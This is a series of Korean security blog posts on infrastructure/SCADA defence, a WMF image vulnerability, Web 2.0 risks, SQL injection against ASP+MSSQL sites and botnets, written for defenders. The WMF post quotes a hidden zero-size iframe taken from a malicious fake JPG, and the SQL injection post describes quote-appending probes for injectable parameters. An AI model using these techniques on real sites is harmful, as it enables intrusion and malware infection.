1.      Cyber Terror Cyber war   대비하여 국가단위의 기반시설 보호 기구 설립

2.      미래 발생 가능한 바이러스 및 해킹에 대한 연구

3.      기반시설에 대한 외부 접속지점의 최소화 및  엄격한 관리 및 보안정책 필요.

4.      기반시설의 외부 정보 제공 부분이나  연결지점의 엄격한 관리

5.      기반시설 제어 시스템을 원격에서 직접 제어 시스템에 접근을 하지 못하도록 정책 설정

6.      기반시설과 연결된 내부 사용 PC와 서버군에 대한 바이러스 및 해킹 대책 완비

7.      내부 사용자에 대한 보안교육강화 및 보안 조직 강화

8.      기반시설 시스템 제작 업체에서의 원격지원 최소화

9.       기반시설 제어시스템 내의 원격접속 허용여부 검사

10.  기반시설 제어 시스템에 대한 대외 정보 유출 금지

11.   솔루션 도입시의 보안 방안에 대한 철저한 검토

 

Security Technic

 

 

n        외부 접속이 필요할 경우의 엄격한 제한 및 권한제어 필요

n        DMZ 내의 시스템에 대한 보안강화 뿐 아니라 내부망에 대한 자체 보안성을 높일 것을 권고

n        VPN 의 사용 뿐 아니라 서버자체에 대한 무결성 도구를 이용하여 보안을 높일 것

n        내부망에 대한 접속 경로의 최소화와 모니터링 집중도 높일 것을 권고

n        이메일의 암호화 및 파일 및 디렉토리에 대한 Locking 을 강화할 것

n        정기적이고 철저한 보안성 검사 및 취약성 점검을 수행할 것

n        SCADA 장비의 비 정상적인 움직임이 나타나는 경우의 제어방법 강구 및 모니터링 방안에 대한 고려

          

Virus :

1.      알려지지 않은 바이러스 의 침투에 대해 대비할 수 있도록 Anomaly Detection 이나 Heuristic Logic 을 적용한  방어책이 가능하도록 대비

2.      파일의 다운로드나 첨부파일 오픈시에 무조건적인 주의를 기울이며 바이러스 엔진의 가동이 필수적임

3.      이메일 전체에 대해 메일 필터링 Gateway 등을 설치하여 걸러서 받도록 설정

4.      웹 컨텐츠에 대한 검사를 수행하여 위험요소의 적극적인 차단

 

해킹

A.       IDS  , Firewall ,  Router 등의 보안 장비에 대한 종합적인 로그 진단

B.       수많은 로그에서 중요 침입 정보만을 필터링 할 수 있는 고급 ESM 의 도입이 필요

C.       주기적인  취약점 점검 및 검사

D.       해킹을 당한 후에도 피해가 최소화 되도록 전문적인 정보보호 구조의 설계 및 구현

E.       전문화된 인력이 없을 경우 신뢰할 수 있는 기관이나 국가설립 기관에서 Managed Security를 시행

F.       해킹관련 보안 전문가의 확충

 

Security for Future

 

 

보안 전문인력의 확충 및 능력을 향상 시켜야 되며 거시적인 안목에서 국가 안보를 생각 하고 대책을 수립해야 하는 시점이 아닌가 생각한다. 다음세대를 좌우할 보안제품의 안목을 거시적인 안목으로 설계하고 구현하도록 조언하는 전문가 집단 혹은 능력을 지닌 인력들을 양성해야 되며 이와 같은 인력과 조직을 통해 미래 발생 가능한 위협에 대한 분석과 대처 능력을 향상 시키는 것이 우선시 되어야 할 것이다. 인터넷 인구의 비율과 초고속 망의 일반화 또 무선인터넷의 활용도가 높아 지고 있는 시점에서 당장 수익이 나지 않는다는 이유 만으로 보안부문을 등한시 할 경우 많은 문제점을 가질

수 있음을 인식하고 노력하여야 할 것이다.

 

사소한 부주의와 실수로 인해 기반시설의 피해와 오류가 발생한다면 그 피해는 당장 실감할 수 있는 정도의 큰 규모가 될 것이므로 미리 알고 대책을 수립하고 방안을 구체화 한다면 진정한 사이버강국으로서의 면모를 일신하게 될 것이다. 이익에 집착하여 제품의 구상과 구현에 많은 노력과 투자를 하지 않는다면 세계적인 회사의 대열에 진입할 수 없을 뿐 아니라 1,2 위만 살아 남는 현실에서 많은 어려움을 겪을 것이라고 짐작할 수 있으며 기업이 가지고 있는 모든 에너지와 자원에서 일정비율 만이라도 다음세대를 선도할 모델이나 제품 개발에 힘을 쏟음으로써 경쟁력을 만회하고 한 획을 그을 수 있다는 결론은 당연해 진다.

해킹과 바이러스의 결합을 통해 새로운 보안모델이 필요함을 깨달았다면 이젠 피해대상의 한계와 그 여파에 대해서도 미리 알고 준비하는 것이 필요하다고 생각한다.

해킹과 바이러스의 경계를 구분하는 것 조차 무의미한 시대에서 지난 시대의 경험도 소중한 자산이지만 흐름을 놓치지 않고 맥을 잡아서 효율적이고 유리하도록 만드는 안목도 중요한 자산이 될 것이다.

 

항목으로 보자면 다음과 같다.

 

1. 보안 전문인력풀의 확대 및 수준 향상

2. 국가나 신뢰할 수 있는 기관에서 체계적으로 관리할 수 있는 위기관리 혹은 Security 팀의 조직 및 활동

3. 해킹 및 바이러스의 동향 뿐 아니라 미래에 발전 가능한 양상 까지도 추측하고 대응할 수 있도록 준비하는 조직이나 문화의 형성

4. 정기적인 취약성 점검

5. 기업체나 관공서의 보안조직 활성화 및 권한 부여

6. 국익을 위한 전략 보안기술에 대한 연구

이외에도 많은 사항들이 있겠지만 차차 지적이 되고 개선이 되리라 생각한다

 

 

조금 다른 부분의 이야기 이지만  모든 사람이 영화상에 나오는 위험이 실제로 일어날지에 관심을 기울이고 있는데 보다 다른 방식에서 어떻게 하면 문제가 되는 부분을 줄이고 최소화 할 수 있는 지에 대한 고민도 있어야 됩니다. 문제는 이미 예전 부터 있어왔고 앞으로는 더욱 심화될 것입니다. 에스토니아의 사례에서 보듯이 정보화가 진행되고 고도화가 진행 될 수록 더 심각한 피해를 입을 수 있습니다.

 

본 게시물의 거의 모든 내용은 2002 10월에 작성된 공개문서에서 따왔습니다. 문제 개요 및 대책 부분에 대한 내용들 모두가 2002년의 공개문서에서 차용을 하였습니다. SCADA DCS라는 용어 자체도 익숙하지 않을 때 작성한 것이라 영양가가 없었는데 5년 가량 지난 시점에서 동일한 문서를 참고 한다는 것이 아이러니컬 합니다.  2002년 이나 지금이나 달라진 것은 많이 없고 문제가 발생 할 수 있는 가능성만 더 증가 하였기에 문맥상에서 많은 부분을 고칠 필요가 없지 않나 판단 하였습니다.

 

SCADA DCS의 기본적인 구성은 아마 컨트롤 패널 같은데 이 게시물에 처음의 이미지에서 여성분 뒤의 배경을 보시면 대충 인지가 가능 할 것 같습니다. 2002년의 문서는 여기를 참고 하시면 됩니다.  http://blog.naver.com/p4ssion/50001878886

 

스스로의 만족과 욕구 충족을 위해 만든 것이기는 하나 감히 최초의 종합화된 문서가 아닐까 예상해 봅니다. ^^ ( 참 쓸데 없는 일들 많이 했죠. )

 

Posted by 바다란

안녕하세요. 바다란입니다.

 

 

wmf 관련된 IM웜 (sdbot ) 및 이메일 전파 웜 , 악성코드 설치 유형이 급격하게 증가하고 있습니다. 12월 말을 기점으로 대폭 증가된 형태로 발견이 되고 있으며 위험성이 높습니다. 현재의 악성코드 루틴과 결합시에 국내 사용자들의  대규모 피해가 우려 됩니다. 공격코드 자체가 그리 어렵지 않다보니 상당히 많은 변형도 출현이 가능하고 피해 노출 방법도 다양한 방식으로 가능하므로 향후 변화가 많을 것으로 판단됩니다.

 

해외 최대 보안관련 사이트인 sans.org 에서는 wmf 취약성을 이용한 웜 및 바이러스에 대해 투표도 진행하고 있습니다. 그냥 사라질 것인가? 아님 2006년을 빛나게(?)할 취약성인가?..하는.. 투표입니다. ㅠ,ㅠ

이슈가 된 메신저 전송 jpg 파일에 대해서 직접 분석을 해본 결과 실제 jpg 파일은 아니며 HTML 컨텐츠 입니다. 내부 소스는 아래와 같은 링크 코드가 존재합니다. 

 

-----------------------------------
<body>
<P ALIGN=center><IFRAME SRC="foto.wmf" WIDTH=0 HEIGHT=0></IFRAME></P>
</body>
-----------------------------------

여기에서 WMF 파일이 악성코드를 실행 시키고 외부 사이트에서 다운로드 하는 역할을 맡고 있습니다.
또한 제가 앞서 말씀드린 대로 이미지 파일 및 팩스 미리 보기 기능과 연관된 DLL 이 문제가 있는 관계로 WMF 파일에 마우스만 올려 두어도 미리보기 기능이 동작하여 바이러스가 감염이 됩니다.
즉 웹사이트 방문 만으로도 감염이 되며 해당 악성코드의 업로드 시에 대량의 피해자가 발생 할 수 있을 것 같습니다.

 

추가적으로 jpg, gif 등 모든 이미지 파일 포맷으로 이름 위장이 가능하며 윈도우 시스템의 특성상 해당 이미지를 보기 위한 최적 DLL을 자동으로 찾는 과정에서문제가 발생할 것으로 예상이 됩니다. 그러므로  우선적으로 wmf 파일의 업로드를 금지하고 내부에 wmf 파일 링크를 지는 URL을 탐지하며 장기적으로는 파일 헤더 검색을 통한 검출루틴이 필요한 부분으로 판단이 됩니다.

제가 판단하기에는 현재의 악성코드를 통한 정보 유출 이슈와 결합시 국내에 폭발적인 피해가 발생 할 것 같습니다.


서비스 제공자 단위 대책:

1. WMF 파일의 업로드 금지 설정

2. WMF 파일을  내부 컨텐츠로 포함시킨 ( Iframe , 링크 등 ) 링크의 검출 및 제거

3. 파일 헤더 검사를 통한 WMF 파일 검출 ( 좀 시일이 걸릴듯 )

 

 

클라이언트 단위 대책:

*.  DLL 등록해제를 통한 임시 해결 방안
  - Microsoft는 보안권고에서 다음과 같이 임시 해결방안을 제시함
    * Windows XP SP1, XP SP2, Server 2003, Server 2003 SP1 사용자의 경우, Windows 사진 및      팩스 뷰어(shimgvw.dll)의 등록을 해제한다.
     step) 윈도우 시작버튼 클릭 -> 실행(R) 클릭
               regsvr32 -u %windir%\system32\shimgvw.dll 입력하고 확인 버튼 클릭
               ※ 이 작업은 이미지 파일을 더블클릭해도 Windows 사진 및 팩스 뷰어로 볼 수 없게 만드는 것임 또한 미리보기 기능이 안됩니다.

 - 향후 마이크로소프트의 패치버전을 설치하면 원래 상태로 되돌릴 수 있다.
      step) 윈도우 시작버튼 클릭 -> 실행(R) 클릭
               regsvr32 %windir%\system32\shimgvw.dll 입력하고 확인 버튼 클릭

 

 *. 비공식 패치의 설치 ( 그다지 권고 하지는 않습니다.)

  http://isc.sans.org/diary.php?date=2005-12-31 - 게시물 항목
  http://handlers.sans.org/tliston/wmffix_hexblog13.exe  - Unofficial Hotfix

 

피해가 우려되는 버전은 다음과 같습니다. ( MS의 KB Article 참조)

Microsoft Windows 2000 Service Pack 4
Microsoft Windows XP Service Pack 1
Microsoft Windows XP Service Pack 2
Microsoft Windows XP Professional x64 Edition
Microsoft Windows Server 2003 
Microsoft Windows Server 2003 for Itanium-based Systems
Microsoft Windows Server 2003 Service Pack 1
Microsoft Windows Server 2003 with SP1 for Itanium-based Systems
Microsoft Windows Server 2003 x64 Edition
Microsoft Windows 98, Microsoft Windows 98 Second Edition (SE), and Microsoft Windows Millennium Edition (ME)
 

 

관련 정보 사이트:

http://www.certcc.or.kr/intro/notice_read.jsp?NUM=107&menu=1   - 그래픽 렌더링 엔진 취약점

권고 파일
http://www.microsoft.com/technet/security/advisory/912840.mspx
http://www.f-secure.com/weblog/archives/archive-122005.html#00000752
http://isc.sans.org/diary.php?storyid=972

Posted by 바다란
< O'Reily의 Web 2.0 Image>

 

 

4.12일의 ICAT 2007 워크샵에서 'Web 2.0 Security'라는 article로 발표를 하게 되었습니다. 아래의 내용은 그 발표자료의 골격을 구성하는 내용입니다. 발표 이후 발표자료를 올리도록 하겠습니다. 지금의 Web 2.0의 열풍과 변화에는 간과되고 있는 부분이 너무 많다는 것이 개인 소견입니다.

 

 

 

최근 UCC라 불리는 저작물에 대해서 여러 가지 문제가 발생 하고 있고 사용자 친화 환경의 변화에 따라 많은 위험요소들이 도출 되고 있습니다. 한번쯤 위험요소를 실례로 보고 대책과 대안은 무엇이 있는지 그리고 방향은 어떤 방향으로 가는 것이 맞는 지에 대해서 의견을 피력 하였습니다. 관련 내용 참고 하시면 될 것 같습니다.

 

UCC의 정의부터 다시 해야 할 것 같은데 사용자가 저작하는 모든 유형의 매개물을 UCC라 정의 할 수 있습니다. 사실상 Web2.0이라는 것은 현상을 정의 하기 위한 용어일 뿐입니다. 인터넷을 이용한 부분적인 정보 참고와 정보 획득의 수단으로서의 도구 측면의 접근이 이전 까지의 접근이라면 이제는 생활과 연결 되는 부분에 직접 영향을 미치는 단위까지 인터넷이 확장 되고 있습니다.

정확하게는 확장이 아니며 인터넷의 활용에 숙달이 된 사용자들이 생활 단위와 행동 양식까지도 깊숙하게 끌어 들이고 생활을 변화 시키고 그 변화의 중심에 인터넷이 존재하는 것이죠. 생활과 관련 이 있으니 이제는 IT 서비스 기업들도 직접적인 영향력을 지니게 됩니다. 조금의 시간이 더 지나게 되면  각 분야별로 눈에 보이게 되겠죠.

 

일반 TV를 예로 들면 오로지  3채널 뿐인 것에서   -> 케이블 TV , 위성방송 채널 등 다수의 채널 등장 -> 주문형 TV의 일반화로 볼 수 있습니다. 이 과정에 방송사들의 다시보기 서비스와 같은 것들은 또 밀려 나겠죠. 실시간으로 저장을 하고 사용자가 원하는 시간대에 보도록 할 수 있으니 말입니다.

 

Web2.0은 새로운 기술이 아니며 사용자의 참여를 통해 적극적으로 생활이 변화해 가는 과정의 일부를 지칭하는 용어일 뿐입니다. 패러다임의 전환기를 정의하기 위한 요소 명칭일 뿐인 거죠.

 

차후에 좀 더 개념에 대한 정리를 해보도록 하겠습니다. 지금은 보호 관점에서 생활에 밀접하게 연관되도록 서비스를 제공하고 활용하는 사용자와 기업 두 측면에서 필요한 것들이 무엇이 있을지 간략하게 정리 해 본 수준입니다.

 

실제 문제 사례 :

 

-        Myspace script 코드를 활용한 서비스 내의 사용자 정보의 유출과 전파

-        Yahoo Messenger를 통한 웜의 출현

-        Web 2.0 서비스 기업을 타켓팅화한 Application 취약성 공개의 일반화 [ XSS 등]

-        Youtube , Yahoo ,naver등의 동영상 저작권 및 국가간 규정에  따른 불법적인 동영상  [ 음란 , 폭력  등등 ] 을 통한 사회적인 파급효과 , 3.19일 야후 음란 동영상 게재로 인해 동영상 서비스의 일시 중단 시행.

-        동영상을 파일을 통한 악성코드 유포 [ ActiveX 설치 이외에 사용자 정보를 유출 하기 위한 Script 코드등 다수 해당] Flash , 이미지 파일을 통한 정보 유출

-         사용자 계정의 도용 [ 아바타 및 아이템의 분실, 강탈 증가]

-        부정확한 게시물을 통한 광고 [ 게시물 , 덧글 등]

-        광고를 하기 위한 목적 혹은 사용자 PC를 조정하기 위한 ActiveX [ 사회공학적인 해킹 부분]

-        악성코드의 문제 [ 사용자 접근성 확대에 따른 악성코드 노출 영역의 극대화]

 

 

-서비스 기업으로서의 보호:

 

UCC에 대한 보안성 검증 : 기술적인 보안성을 검증 하여야 함. 게시물에 포함된 악성코드 및 HTML을 허용하여 사용자의 자유도를 높이는 만큼 그 위험성 ( XSS 및 Code Running)에 대해서 보호 방안을 수립 하여야 함. 보호 방안으로서는 Filtering 메소드의 필수적인 환경 구축 및 활용이 필요.  

 

n   Filtering Method

u 개인정보 침해 관련 사안의 조정  댓글 ,게시글

u 악성코드 실행 부분  게시물 , HTML 파일 , Image , Flash , 동영상

u 악성코드 위험 요소 판별을 위한 자동 판별 시스템 도입 및 수작업에 의한 모니터링 필수 [ 모니터링 대상 항목  성인, 개인정보 침해 , 악성코드 설치 , 광고글 , 개인정보 유출 관련 실행 코드 , Virus , Worm ]

 

n    Platform 의 체계화

u Filtering 시스템에 대한 체계적인 구성

u 전체 사용자 입력에 대한 Filtering 구조의 수립

u 전문 보안인력에 의한 Filtering Rule의 추가 및 빠른 변화에 대한 대응 능력 재고 필요

u 사용자의 직접 입력 시에 빠른 모니터링이 안될 경우 기업 입장에서는 치명적인 문제에 노출 될 가능성 증대 됨

 

n    개인정보 보호 관련 대응 방안 수립 필요

u  개인정보 관련 이슈는 기술적 방안으로 최소화 시키는 것이 필요 . Filtering과 연계하여 구성 하는 것이 필요

u  개인 정보 오남용 관련된 모니터링 필수

u  개인정보 오남용시의 필수 대응 프로세스의 수립  고객센터부터 실 서비스 부서까지 빠른 대응 필요

 

n        Web service에 대한 기술적인 보호

u  보안성 검수 프로세스의 일반화  전문인력 및 보안 전문가 집단을 활용한 최신 취약성에 대한 검수 체제 수립

u  Web Service를 구성하는 최신 기술 동향에 대한 취약성 연구

u  Web 2.0의 요소 기술간의 정보 전달 부분의 암호화 및 외부 노출 최소화

u  비정상 행위 탐지를 위한 Anomaly Detection 부분의 구축

u  현재 당면한 SQL Injection 및 XSS [ Cross Site Scripting]에 대한 전면적인 대책 수립 이후의 프로세스화

u  서비스 보호를 위한 전문가 집단의 수시 활용 또는 전문가 집단의 보유 필수

u  사용자 ID/ Password에 대한 보호 방안 수립과 시행 [ ex : password의 단방향 암호화등 ]

 

n        사용자에 대한 Security awareness 강화

u  서비스 차원에서의 게시물에 대한 악성코드 , 위법성 여부에 대한 Awareness 강화

u  불법 악성코드 및 개인정보 유출 관련된 사용자에 대한 합리적인 처벌 방안 마련

u  보안상의 문제 해결을 위한 서비스 기업 차원의 정보 제공 확대 및 위험 여부 , 법적인 위배 사항에 대한 명확한 가이드 수립

 

 

-        사용자 관점에서의 보호

 

사용자 관점에서의 보호는Client 상에서의 Web 2.0관련된 일련의 기술 흐름에 대한 보호 대책을 언급 한다. 향후 발생 가능할 부분에 대한 Security Awareness 측면에서의 사용자 보호 방안

 

n   개인 PC 차원의 보호 방안 수립

u  메일 및 게시물의 링크 선택 시 접근에 유의

u  첨부 파일등에 의한 바이러스, 웜등의 감염 주의

u  AV 백신 및 각 운영 체제별 보안패치 및 설정

u  ActiveX 의 시스템 설치 제한 및 확인

u  주기적인 보안설정 검사 [ AV 체크 , 보안설정 체크 ]

 

n   사용자 정보 보호

u  주기적인 패스워드의 변경

u  사이트별 분류에 따른 등급 관리 및 ID / 패스워드의 분리 활용

u  사이트 가입시의 보안 등급의 확인 [ 일정 수준 이상의 정보보호 수준을 인증  기존의 안전진단 및 보안컨설팅 , ISMS 인증 등에 네트워크 보안 및 ID/PASS 보호 방안에 대한 확인 이후 일정수준의 등급 부여 필요]

u  정부기관 및 신뢰된 사이트로부터 배포되는 보안 솔루션에 대한 선별 설치 필요 [ 키보드 보안 , 보안패치 , AV 솔루션 등등]

 

 

위와 같이 정리가 됩니다.  거칠게 정리한 내용이며 필요한 항목에 대해서만 기술이 되어 있습니다. 어느 정도 단계에 이르면 보다 체계적이고 다양한 방면으로 정리가 될 것 같습니다.

의견 있으신 분들은 적극적으로 의견 주세요.

 

좋은 하루 되세요.

 

Posted by 바다란

 

안녕하세요. 바다란입니다.

 

금년 5월 부터 유명 사이트에 대한 해킹들이 연이어져 왔습니다.

이 문제의 근본은 여러번 언급 하였지만 Validation Check가 되지 않은 불안전한 프로그래밍으로 인해 발생합니다. 즉 DB서버와 Web Server와는 서로 직접적인 연결이 되어 있습니다. ASP , ASPX , PHP , JSP 등등을 이용하여 DB와 직접 연결하는 구조입니다.

이 부분에서 Validation 체크가 안된다는 것은 DB에 쿼리를 실행하도록 웹서버상의 언어에서 인자를 입력할때 이 인자의 유효성에 대한 체크가 전혀 되지 않아서 문제가 됩니다.

 

' 문자나 And 문자를 웹 URL의 인자 각각의 값에 덧 붙여 넣었을 경우 500 Error가 발생하거나 Unclosed Quotation Mark와 같은 DB에러가 Display 된다면 여러번의 다중 쿼리를 통하여 DB의 권한 획득이 가능하고  ( user , Password 획득 가능 ) DB 테이블 전체에 대한 조회가 가능해 집니다.

 

일반적으로 500 에러가 발생할 경우 Internal Server Error 라고 IE 화면에 Display 되어 DB와의 연결 작업에서 에러가 발생한 것으로만 알았으나 실제 실행된 값도  ^  ^ 문자로 둘러 쌓여서 전송이 되고 다만 화면에 표시될때에만 500 에러에 대한 화면이 표시되므로 문제가 있는지 여부를 몰랐죠.

그러나 실제 트래픽을 모니터링 하여 오는 값을 필터링 할 경우 DB의 모든 값들에 대한 조회가 가능합니다.

 

국내 대부분의 사이트에서 ASP + MSSQL 서버 조합에 대해서는 위험 경고를 내립니다.

그외의 jsp , php  + mysql , Oracle 조합에 대해서는 주의 경고를 내립니다.

 

위험 경고는 지금 당장 DB에 대한 권한이 유출될 수 있으며 시스템에 대한 위해행위가 계속 될 수 있음을 의미 합니다. 그리고 ASP + MSSQL 조합에 대해서는 이미 공격하는 자동화된 툴들이 다수 중국에서 유통이 되고 있는 상황이므로 긴급한 경고가 필요합니다.

 

* MSSQL을 운영하시는 분들은 지금 당장 확인해 보십시요 . DB 테이블에 D_.... , X_... , Jiaozou , t_jiaozou , xiarou  등과 같은 테이블 명이 있다면 이미 시스템에 백도어가 생성이 되어 있을 수 있고 한차례 이상 시스템에 대한 명령이 실행 되었다는 것을 의미 합니다. 아마 매우 많은 수치의 MSSQL DB에 위와 같은 테이블이 생성이 되어 있을 것입니다.

 

국내 사이트들을 보면 Secure Programming에 대한 의식이 전혀 없이 일반적인 지식을 지닌 프로그래머들을  저가에 고용을 하다보니 문제가 발생하였고 서적들의 경우에도 웹 프로그래밍에 대한 서적들은 많지만 근본적인 보안상의 문제가 발생할 만한 부분을 지적한 서적은 전혀 없습니다. 모든 서적들이 기능에 촛점이 맞춰져 있다보니 이런 문제가 발생하고 있으며 국내 대부분의 웹사이트가 크고 작은 문제를 지니고 있을 것입니다.

 

ASP + MSSQL 조합으로 이루어진 모든 웹사이트가 국내에 얼마나 될까요?..

이 사이트들 전부다가 경고의 대상이며 최소한 전체 웹사이트의 절반 이상이 위험한 상태입니다.

중국내의 공격 동향의 경우 google등의 검색엔진을 이용하여 url에 asp를 사용하고 사이트를 유명사이트로 고정을 하여 검색한 뒤 각 인자에 대해  ' 문자 혹은 And 문자를 대입하여 에러 여부를 검색하거나 자동화된 툴을 이용하여 임의적인 공격을 수행합니다.

 

포털 및 게임 사이트 전체 , IT 관련 기업 , 언론 사이트들 전부가 위험하며 각 사이트의 하위 도메인에 분명히 ASP + MSSQL 조합을 사용하는 사이트들이 다수 존재합니다. 이런 사이트를 통해 악성코드 전파지로 계속해서 언론 지상에 오르게 될 것입니다.

지금껏 나온 수많은 유명 사이트들은 빙산의 일각입니다.

 

저의 경고는 내년까지도 유효한 경고 입니다.

 

10월 중순에 KISA에서 웹 보안 관련된 세미나를 한다는 군요. 기회가 된다면 제가 발표를 하게 될 것 같습니다. 그때에도 심각한 주제를 전달 하도록 하겠습니다.

지금 한번 찾아보세요. MSSQL DB내에 위에 언급한 테이블들이 존재하는지?... 아마도 존재할껍니다. 그렇다면 이미 DB의 권한 및 데이터는 다 나간 상태이며 시스템에 대한 제어도 장담 못할 상태라는 거죠.

 

대책은 임시로  이 글을 참고 하세요. http://blog.naver.com/p4ssion/40015866029 

이 글 외에도 몇 몇 참고할 글들이 해킹 웜 바이러스 섹션에 있을 것입니다.

 

그럼 좋은 나날들 되십시요.

Posted by 바다란

2002년 8월 초에 작성한 내용입니다.

 

2006년인 지금도 중국으로 부터의 위협은 대단히 심각한 상황이지만 그 시작은 2002년 부터라고 보는 것이 정답일껍니다.

이때 처음으로 중국 사이트들 돌아다니면서 현황 파악해보길 향후 심각한 위협이 될 것이라고 판단 했었는데..

 

문서의 근간은 침해사고를 당한 서버에 올려진 공격툴등을 분석한게 기본 모체인데.. 사고 분석을 하다보니 종합선물세트처럼 되어 있더군요.

 

이런 문서를 만들면서 나름대로 공부가 많이 되었던 것 같습니다.

가르쳐 주는 사람이 없어도.. 스스로가 배우는 것이 공부이고 배움이라고 생각 되네요.

가르침이 없어도 좋다. 내가 가르침이 된다. 뭐 이런 궤변인가?..

아무튼 스스로가 배우고자 하고 덤벼들어야만 무언가를 할 수 있는 것이 아닐런지요.

 

이때 여러 사이트에 글을 썼었는데 앞으로 홍커가 온다고 이야기 하던 기억이 나네요.

이제 실감나게 2005년 부터 오고 있으니.. 틀린말은 아닌 것 같습니다.

 

그럼. - 아..하루 업로드 파일 용량 제한이 있네요..이 파일은 다음에 생각나면 다시 올리겠습니다.

Threat of china 로 검색 하시거나 winsnort 또는 바다란 으로 검색하시면 PDF 파일 보실 수 있을 겁니다. - v파일은 올렸습니다.

 

--

아.. 명의 도용의 시작이라기 보다는 명의도용은 오래된 일이고 악성코드를 금전적인 이득을 위해 유포하거나 사이트 해킹을 직접 시도하여 이익을 취하고자 하는 행위는 2005년 부터가 시작이죠. 공격은 2002년 경 부터 시작이 되었다는 이야기 입니다. 뭐 출발지는 똑같죠. 최근의 악성코드 해킹에도 상당히 고수준의 공격자 및 공격툴 제작자들도 돈벌이에 나서는 판이니... 똑같은 뿌리라고 볼 수 있을겁니다.

 

Posted by 바다란

http://news.naver.com/news/read.php?mode=LSS2D&office_id=092&article_id=0000008198&section_id=105&section_id2=283&menu_id=105

 

보안 기술은 계속 발전 하고 있고 보안을 주 업종으로 삼고 있는 기업들은 공격을 충분히 제어 하고 있다고 말합니다. 모든 솔루션을 도입하면 문제가 해결 되는 것 처럼 이야기 하고 실제로 논의 하고 있으나 현재의 위협은 보다 더 사용자와 기업에게 가까워져 있습니다.

 

솔루션의 도입으로 처리 될 수 있는 문제는 이미 지나간 문제이며 개발 시점에 또 다른 위협요소가 발견이 되고 있고 문제가 되고 있습니다.

Zeroday Attack [ 취약성에 대한 패치가 나오기 이전에 공격 코드가 출현하는 것 ]과 Monster Bot [ 하나의 취약성을 공격하여 수십가지 이상의 공격 도구 및 취약성을 통한 확장을 시도하는 Bot]의 출현은 현재 전 세계의 IT Infra가 직면한 위협입니다.

 

공격 대상이 기업 단위를 넘어 직접적인 사용자 단위에 까지 접근 하고 있어 IT산업을 주된 영역으로 하는 인터넷 비즈니스 기업외에도 일반 기업에게도 직접적인 위협 대상이 되며 보안이 강화되지 않은 기업의 정보들은 일반 사용자들 대다수의 개인정보 및 중요정보를 노출 시키고 문제화 되게 만들고 있습니다.

 

 

솔루션의 도입은 타당합니다. 그러나 정답은 아니라고 할 수 있습니다. 솔루션은 점점 더 늘어만 가는데 하는 일은 줄어 들지 않습니다.
오히려 더욱 많은 부분을 신경 써야 하고 Super Extra에 해당되는 능력을 요구하고 있습니다.  왜 그럴까요?

 

앞서 말씀드린 위협의 실제적인 출현과 비지니스에 직접 영향을 줄 수 있는 범주의 공격은 많은 부분을 고민하게 만들고 기술의 발전은 많은 구성요소에 대한 직접 검토와 검수가 필요한 부분이며 인프라에 대한 위협을 낮추기 위해서는 내.외부의 위협을 검토하고 조정해야 하는 수많은 일들이 지속적으로 증가할 수 밖에 없기 때문에 앞으로도 IT산업이 발전 할 수록 일은 더욱 늘어날 것입니다.

 

빠르게 발전하는 위협에 대한 대응은 같은 속도로 진화해 갈 수 있는 동일한 능력을 보유한 White Group에 의해 이루어 질 수 있습니다. 그러나 모든 회사가 White Hacker 그룹을 보유 할 수는 없습니다. 그리고 개별 회사의 뛰어난 능력을 모든 산업을 위해서 쓸 수도 없습니다.  너무나도 많은 희생이 필요하기 때문이죠. 회사든 개인이든..

 

공격 기술이든 보안 기술이든간에 서로 발전하고 있고 발전의 폭은 공격 기술이 더욱 높습니다. 모든 것을 함께 공유하여  새로운 시도가 이루어 지기 때문인데 보안 기술은 그렇지 못하고 있습니다. 공유의 폭도 좁으며 공유 할 수 있는 정보 자체도 한계가 있습니다.

앞으로도 더욱 큰 차이가 발생 할 수 있을 것으로 판단되며 전문인력을 보유하여 업무 전반적인 부분에 보안 프로세스가 스며 있어서 습관화된  기업과 그렇지 못한 기업의 차이는 단 한번에 극명하게 차이가 날 것입니다.  인력의 보유가 전부가 아닌 업무 프로세스 전반에 걸쳐 보안 관련 부분이 스며 들어 있고 분명하고 명확한 의사결정 및 정책의 지지에 의해 차이는 더욱 극대화 될 것입니다.

 

글로벌 기업일 수록 더욱 더 실감할 수 있는 위협은 이미 너무 가까이에 다가와 있으며 언제든 현실화 될 것입니다.


 

보안 기술은 빠르게 발전 합니다.

그러나 보안기술 보다 더욱 빠르게 발전하는 것은 공격에 관련된 기술입니다.

일명 BotNet 이라 불리는 좀비 PC [ 취약성을 공격하여 권한을 획득한 PC] 를 이용한 거대한 컨트롤 공격의 위험도도 상당히 높은 상태입니다. 보안 기술은 이제 외부의 위험으로 부터 보호하는 정책으로 급격하게 선회 하였으며 해당 정책에 따라 외부의 위험으로 부터 격리 시키는 정책과 기술적인 대책이 가장 중요하게 취급이 되고 있습니다. 일반적인 기업의 경우 외부의 위험으로 부터 격리 시키는 것은 그리 어렵지 않습니다.


그러나 IT 기반의 영역을 주된 사업 기반으로 지니고 있는 기업의 경우 고객과의 접점과 회사의 이익 발생 부분 대다수가 웹 및 인터넷을 이용한 영역이라 외부의 위험으로 부터 격리 시킨다는 것이 가장 어려운 영역의 일이 됩니다.

 

계정과 접근에 대한 일관된 프로세스 및 기술적인 대안이 명확해야 하고 Identity 관리 부분에 있어 직원이나 외부의 고객이 접근 하는 통로에 대해 분명한 가이드와 명확한 정책 , 일관된 방침이 유지가 되어야만 위험요소를 줄일 수 있습니다.

 

공격 기술의 발달과 보안 기술의 발달 측면에서 현재는 소수의 공격자가 대규모의 공격 가능 자원 [ 좀비PC Network - BotNet]을 이용하여 개별적인 대응외에는 종합적인 대응이 어려운 개개의 산업을 위협하고 있는 형국입니다.

보안 분야의 Role을 수행하는 그룹이나 팀에게는 보다 더 편리하고 편리성에 기반한 오픈을 요구하고 있으나 외부의 위협을 분명히 인지하고 있는 팀에게는 위험부담이 크며 또한 관리 포인트가 급격하게 증가하는 위험성이 동시에 존재하고 있습니다.

편리성과  보안성은 예전부터 상극을 이루고 있었으나 기업의 비지니스에 치명적인 영향을 줄 수 있으므로 편리성에 대한 약간의 양보가 지속적으로 요구 되며 보안 강화를 위한 아이덴티티 관리 [ 계정 , 접속 보안 강화 ]에 명확한 이해가 수반 되어야 합니다.

 

기업의 비지니스를 지키기 위한 노력은 앞으로 Infra 측면에서 심대한 노력이 필요할 것으로 판단되며 노력을 하는 기업과 그렇지 못한 기업의 차이는 매우 클 것입니다. 분명해질 시점은 지금 부터 이겠죠.

 

- 바다란 . p4ssion

 

